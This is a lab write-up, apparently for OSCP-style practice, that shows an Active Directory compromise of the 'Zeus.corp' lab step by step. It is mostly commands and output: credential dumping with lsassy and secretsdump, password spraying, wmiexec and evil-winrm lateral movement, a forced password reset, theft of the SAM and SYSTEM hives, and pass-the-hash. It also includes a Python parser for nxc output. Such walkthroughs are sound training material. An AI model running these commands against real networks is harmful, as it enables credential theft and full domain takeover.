Information
About this lab
The Zeus Challenge Lab covers a number of hands-on exercises embedded in different client systems within the Zeus.corp domain. Learners will compromise a client system to find and access database configurations, and intercept authentication requests. After intercepting authentication requests, learners will log in to a different system with the captured ticket, then read a specific document to discover cleartext credentials. The final part of this lab asks the learners to log in to the system to reset a user's password and create a backup.
Proof of Concept
Information Gathering
Nmap
# Nmap 7.95 scan initiated Sat Dec 27 00:32:12 2025 as: /usr/lib/nmap/nmap -Pn -n --open --min-rate 3000 -oN scan 192.168.220.158-160
Nmap scan report for 192.168.220.158
Host is up (0.14s latency).
Not shown: 987 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Nmap scan report for 192.168.220.159
Host is up (0.13s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
Nmap scan report for 192.168.220.160
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host Discovery
┌──(kali🎃kali)-[~/oscp]
└─$ nxc smb 192.168.220.158-160
SMB 192.168.220.159 445 CLIENT01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT01) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.220.158 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:zeus.corp) (signing:True) (SMBv1:False)
SMB 192.168.220.160 445 CLIENT02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus.corp) (signing:False) (SMBv1:False)
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
192.168.220.159 - Client01
Eric.Wallows / EricLikesRunning800
Initial Access
winrm
┌──(kali🎃kali)-[~/oscp/159]
└─$ evil-winrm -i 192.168.220.159 -u 'Eric.Wallows' -p 'EricLikesRunning800'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\eric.wallows\Documents>
Check privileges
- Member of the Administrators group
*Evil-WinRM* PS C:\Users> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
7d5fc9fee1214f781eefd5c8edaf6a5f
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.220.159
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.220.254
Post-Exploitation
nxc lsassy module
- o.foller / EarlyMorningFootball777
┌──(kali🎃kali)-[~/oscp/159]
└─$ nxc smb 192.168.220.159 -u 'Eric.Wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.220.159 445 CLIENT01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT01) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.220.159 445 CLIENT01 [+] zeus.corp\Eric.Wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.220.159 445 CLIENT01 zeus\o.foller decca5b9babc228de4cedeb29a6b9abf
LSASSY 192.168.220.159 445 CLIENT01 ZEUS.CORP\o.foller EarlyMorningFootball777
impacket-secretsdump
- Administrator NTLM hash found
- a1fcb4118dfcbf52a53d6299aab57055
┌──(kali🎃kali)-[~/oscp/159]
└─$ impacket-secretsdump Eric.Wallows:EricLikesRunning800@192.168.220.159
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf05dca6ed1673a51e5ae2479cb5da7c0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1fcb4118dfcbf52a53d6299aab57055:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011:::
connection.sql file found in the C:\SQL directory
*Evil-WinRM* PS C:\SQL> dir
Directory: C:\SQL
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/26/2022 8:53 PM 528 connection.sql
DC01 db_user username and password found
- db_user / Password123!
$SqlServer = 'DC01'
$Database = 'master'
$SqlAuthLogin = 'zeus.corp\db_user'
$SqlAuthPw = 'Password123!'
# query to show changes
$Query = '
SELECT @@SERVERNAME AS [ServerName]
, des.login_name
, DB_NAME() AS [DatabaseName]
, dec.net_packet_size
, @@LANGUAGE AS [Language]
, des.program_name
, des.host_name
FROM sys.dm_exec_connections dec
JOIN sys.dm_exec_sessions des ON dec.session_id = des.session_id
WHERE dec.session_id = @@SPID
192.168.220.160 - Client02
Lateral Movement (Client01 to Client02)
SMB authentication to Client02 as o.foller:EarlyMorningFootball777 succeeded
┌──(kali🎃kali)-[~/oscp]
└─$ nxc smb 192.168.220.158-160 -u users.txt -p password.txt --continue-on-success -t 100
SMB 192.168.220.158 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:zeus.corp) (signing:True) (SMBv1:False)
SMB 192.168.220.160 445 CLIENT02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.220.159 445 CLIENT01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT01) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.220.158 445 DC01 [-] zeus.corp\administrator:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.158 445 DC01 [+] zeus.corp\o.foller:EarlyMorningFootball777
SMB 192.168.220.158 445 DC01 [-] zeus.corp\db_user:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.158 445 DC01 [-] zeus.corp\administrator:Password123! STATUS_LOGON_FAILURE
SMB 192.168.220.158 445 DC01 [+] zeus.corp\db_user:Password123!
SMB 192.168.220.160 445 CLIENT02 [-] zeus.corp\administrator:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.160 445 CLIENT02 [+] zeus.corp\o.foller:EarlyMorningFootball777 (Pwn3d!)
SMB 192.168.220.160 445 CLIENT02 [-] zeus.corp\db_user:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.160 445 CLIENT02 [-] zeus.corp\administrator:Password123! STATUS_LOGON_FAILURE
SMB 192.168.220.160 445 CLIENT02 [+] zeus.corp\db_user:Password123!
SMB 192.168.220.159 445 CLIENT01 [-] zeus.corp\administrator:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.159 445 CLIENT01 [+] zeus.corp\o.foller:EarlyMorningFootball777
SMB 192.168.220.159 445 CLIENT01 [-] zeus.corp\db_user:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.159 445 CLIENT01 [-] zeus.corp\administrator:Password123! STATUS_LOGON_FAILURE
SMB 192.168.220.159 445 CLIENT01 [+] zeus.corp\db_user:Password123!
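The nxc output above mixes two kinds of lines worth pulling apart: the host banners, which record that CLIENT01 and CLIENT02 report signing:False (SMB signing not required, the condition a relay attack depends on, and something a defender should fix with the RequireSecuritySignature policy), and the spray results, where [+] means the credential is valid and (Pwn3d!) means it also carries local admin. As an added example that is not part of the original write-up, the following Python parses both line types into a host table and a user-by-host credential matrix; the sample lines are copied from the runs on this page and the function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample: lines copied from the nxc host-discovery, winrm and
# spray runs in this write-up, plus the trailing progress line.
SAMPLE_NXC_LINES = [
    r"SMB 192.168.220.159 445 CLIENT01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT01) (domain:zeus.corp) (signing:False) (SMBv1:False)",
    r"SMB 192.168.220.158 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:zeus.corp) (signing:True) (SMBv1:False)",
    r"SMB 192.168.220.160 445 CLIENT02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus.corp) (signing:False) (SMBv1:False)",
    r"WINRM 192.168.220.158 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:zeus.corp)",
    r"SMB 192.168.220.158 445 DC01 [-] zeus.corp\administrator:EarlyMorningFootball777 STATUS_LOGON_FAILURE",
    r"SMB 192.168.220.158 445 DC01 [+] zeus.corp\o.foller:EarlyMorningFootball777",
    r"SMB 192.168.220.160 445 CLIENT02 [+] zeus.corp\o.foller:EarlyMorningFootball777 (Pwn3d!)",
    r"SMB 192.168.220.160 445 CLIENT02 [+] zeus.corp\db_user:Password123!",
    r"SMB 192.168.220.159 445 CLIENT01 [-] zeus.corp\db_user:EarlyMorningFootball777 STATUS_LOGON_FAILURE",
    r"Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00",
]

# Banner line: "<PROTO> <ip> <port> <name> [*] ... (domain:x) (signing:True|False)".
# The signing field is SMB-only, so it is optional (the WINRM banner lacks it).
BANNER_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+\[\*\].*?"
    r"\(domain:(?P<domain>[^)]+)\)(?:\s+\(signing:(?P<signing>True|False)\))?"
)
# Auth line: "<PROTO> <ip> <port> <name> [+|-] DOMAIN\user:secret [ (Pwn3d!) | STATUS_... ]".
AUTH_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+\[(?P<mark>[+-])\]\s+"
    r"(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<secret>\S+)(?P<rest>.*)$"
)


def parse_nxc(lines):
    """Return (hosts, auths): hosts keyed by IP, auths as a list of dicts."""
    hosts, auths = {}, []
    for line in lines:
        m = BANNER_RE.match(line)
        if m:
            h = hosts.setdefault(m["ip"], {"name": m["name"], "domain": m["domain"], "signing": None})
            if m["signing"] is not None:       # keep a known SMB value over a later WINRM banner
                h["signing"] = m["signing"] == "True"
            continue
        m = AUTH_RE.match(line)
        if m:
            auths.append({
                "ip": m["ip"], "host": m["name"], "proto": m["proto"],
                "user": m["user"].lower(), "secret": m["secret"],
                "success": m["mark"] == "+",
                "admin": "(Pwn3d!)" in m["rest"],
            })
    return hosts, auths


def hosts_without_signing(hosts):
    """IPs whose SMB banner reported signing:False, i.e. relay-exposed hosts."""
    return sorted(ip for ip, h in hosts.items() if h["signing"] is False)


def credential_matrix(auths):
    """user -> {host: 'admin' | 'valid' | 'failed'}; a later line for the same pair wins."""
    matrix = defaultdict(dict)
    for a in auths:
        status = "admin" if a["admin"] else ("valid" if a["success"] else "failed")
        matrix[a["user"]][a["host"]] = status
    return dict(matrix)


def local_admin_pairs(auths):
    """Sorted (user, host) pairs where a valid credential also gave local admin."""
    return sorted({(a["user"], a["host"]) for a in auths if a["admin"]})


if __name__ == "__main__":
    hosts, auths = parse_nxc(SAMPLE_NXC_LINES)
    print("SMB signing not required on:", hosts_without_signing(hosts))
    for user, per_host in credential_matrix(auths).items():
        print(f"{user:15} " + "  ".join(f"{h}={s}" for h, s in per_host.items()))
    print("local admin:", local_admin_pairs(auths))
```

Feeding a real run through the script is a matter of reading stdin with `sys.stdin.read().splitlines()` in place of the constructed list; the regexes deliberately ignore the progress bar and any line that is neither a banner nor an auth result.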
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Connect with wmiexec
┌──(kali🎃kali)-[~/oscp/159]
└─$ impacket-wmiexec o.foller:EarlyMorningFootball777@192.168.220.160 -dc-ip 192.168.220.158
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
Has administrator privileges
C:\>whoami /all
USER INFORMATION
----------------
User Name SID
============= ===============================================
zeus\o.foller S-1-5-21-2826791697-1341466529-4139912853-10601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Read proof.txt
C:\Users\Administrator\Desktop>type proof.txt
3552de8f6a50a45ae51a267b328c09af
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.220.160
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.220.254
Post-Exploitation
Onboarding Document.docx found in the z.thomas directory
C:\users\z.thomas\Downloads>dir
Volume in drive C has no label.
Volume Serial Number is FCF3-9653
Directory of C:\users\z.thomas\Downloads
06/26/2022 09:23 PM <DIR> .
06/26/2022 09:23 PM <DIR> ..
06/26/2022 09:14 PM 6,454 Onboarding Document.docx
1 File(s) 6,454 bytes
2 Dir(s) 29,755,596,800 bytes free
z.thomas account password found in Onboarding Document.docx
- ^1+>pdRLwyct]j,CYmyi
SharpHound data collection
- Confirmed in BloodHound
- The z.thomas account holds GenericAll over the d.chambers account, which allows forcing a password change, and d.chambers is a member of the Backup Operators group
c:\Users\Public\Desktop>.\SharpHound.exe -c All -d zeus.corp --domaincontroller 192.168.220.158 --ldapusername o.foller --ldappassword EarlyMorningFootball777
2025-12-27T07:56:43.3149116+00:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-12-27T07:56:43.4399105+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-12-27T07:56:43.4555368+00:00|INFORMATION|Initializing SharpHound at 7:56 AM on 12/27/2025
2025-12-27T07:56:53.4867921+00:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-12-27T07:56:53.5492885+00:00|INFORMATION|Beginning LDAP search for zeus.corp
2025-12-27T07:56:53.5492885+00:00|INFORMATION|Collecting AdminSDHolder data for zeus.corp
2025-12-27T07:56:53.5961663+00:00|INFORMATION|AdminSDHolder ACL hash 403C5F17FA419DAB50B26B1ADA2134C3B9404111 calculated for zeus.corp.
2025-12-27T07:56:53.6899100+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.6899100+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.7055339+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.7055339+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.7367839+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
192.168.220.158 - DC01
Lateral Movement (Client02 to DC01)
WinRM authentication to DC01 as z.thomas succeeded
┌──(kali🎃kali)-[~/oscp]
└─$ nxc winrm 192.168.220.158 -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi'
WINRM 192.168.220.158 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:zeus.corp)
WINRM 192.168.220.158 5985 DC01 [+] zeus.corp\z.thomas:^1+>pdRLwyct]j,CYmyi (Pwn3d!)
WinRM connection
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.220.158 -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\z.thomas\Documents>
Read local.txt
*Evil-WinRM* PS C:\Users\z.thomas\Desktop> type local.txt
114c8c0887967cfa9df509bba69b5c87
*Evil-WinRM* PS C:\Users\z.thomas\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::8242:993a:ef37:ed3d%12
IPv4 Address. . . . . . . . . . . : 192.168.220.158
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.220.254
Privilege Escalation
Change the d.chambers account password to “1q2w3e4r”
*Evil-WinRM* PS C:\Users\z.thomas\Documents> net user d.chambers 1q2w3e4r /domain
The command completed successfully.
WinRM connection as d.chambers
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.220.158 -u 'd.chambers' -p '1q2w3e4r'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\d.chambers\Documents>
Download the SAM and SYSTEM files
*Evil-WinRM* PS C:\Users\d.chambers\Documents> reg.exe save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\d.chambers\Documents> reg.exe save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\d.chambers\Documents> download sam
Info: Downloading C:\Users\d.chambers\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\d.chambers\Documents> download system
Info: Downloading C:\Users\d.chambers\Documents\system to system
Info: Download successful!
Dump NTLM hashes from the SAM and SYSTEM files
- Administrator NTLM hash dumped successfully
- 650836aac5e819c6afb991606f63f5c3
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xf7d6d584287ffb4f29364a67bc20d85b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:650836aac5e819c6afb991606f63f5c3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
WinRM connection using the obtained administrator NTLM hash
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.220.158 -u 'administrator' -H '650836aac5e819c6afb991606f63f5c3' -
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
dc2abff018bd086fe158c71811f72ecf
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::8242:993a:ef37:ed3d%12
IPv4 Address. . . . . . . . . . . : 192.168.220.158
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.220.254